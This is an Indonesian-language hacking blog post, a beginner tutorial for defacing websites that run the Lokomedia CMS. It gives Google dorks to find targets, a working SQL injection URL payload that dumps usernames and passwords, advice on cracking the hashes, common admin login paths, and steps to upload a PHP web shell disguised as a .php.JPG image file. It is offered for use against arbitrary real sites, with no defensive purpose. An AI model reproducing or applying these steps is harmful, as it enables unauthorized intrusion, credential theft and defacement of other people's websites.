Tutorial Deface SQL Lokomedia - Noob Exploded

Noob Exploded

Blogging , Defacing , Pentesting , News Hacking

  •

    • Saturday, 4 March 2017

    Home Defacing Tutorial Deface SQL Lokomedia

    Tutorial Deface SQL Lokomedia

    Tutorial SQL Lokomedia


    Oke, Kali ini saya akan men-share tutorial SQL Lokomedia,
    Tutorial ini sangan mudah di gunakan pada pemula :D 
    Oke langsung aja :D

     Dork :   - Inurl:kategori-23-hiburan.html
                  - Inurl:hal-tentang-kami.html
                  - Inurl:statis-1-pengantar.html
                  - Inurl:statis-3-visidanmisi.html
                  - Inurl:statis-19-beasiswa.html
                  - Inurl:statis-22-kerjasama.html

     Selebihnya kembangin Sendiri Oke :*

     Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
    =================== CARA NYA ========================

    1. Cari target dahulu , sebagai contoh nya ,saya menggunakan DORK
        kategori-23-hiburan.html  lalu search di GOOGLE , nanti akan banyak 
        SITE nya . 

     2. Buka Website tersebut , Contoh http://site.com/statis-1-pengantar.html
        lalu masukan Exploit nya di  http://site.com/statis--1'union select  /*!50000Concat*/(username,0x20,password)+from+users--+--+-pengantar.html

     Jangan sampai ada spasi , atau exploitnya ketinggalan :v dan tambahkan ( - ) 
    sebelum angka di URL site nya 

     3. Nanti akan keluar username + password nya di Title web , atau di bagian page sitenya 

     4. Jika Password nya menggunakan HASH , Decrypt Password tersebut di 
        hashkiller atau di  md5hashing 

     5. jika password tersebut di temukan carilah admin login nya biasanya ada di
        - http://site.com/admin
        - http://site.com/adminweb
        - http://site.com/administrator
        - http://site.com/redaktur ,atau bisa juga di cari menggunakan find admin login

     6. Jika berhasil masuk upload shell tersebut di galeri foto , atau banner jika gagal bisa upload
         di favico pada web tersebut :D , format shell nya harus berformat contoh.php.JPG 
         (tambah format .jpg) lalu di Tamper Data , bisa download di add ons pada browser yang
         anda gunakan.

     7. Lalu akses shell dengan meng-klik kanan mouse , lalu copy paste alamat link foto yang error nya yang tadi             kamu upload , ke url baru , dan Selesai :D

    Tutorial Ini Sedikit Agak Rumit Karena Tidak Ada Gambarnya , Mohon Maafkan ane cuk :')
    Tags
    Share This
    Author Image

    About Noob Exploded

    By at
    Labels:

    No comments:

    Post a Comment

    Subscribe to: Post Comments (Atom)

    Author Details

    Wibu Bau Bawang :v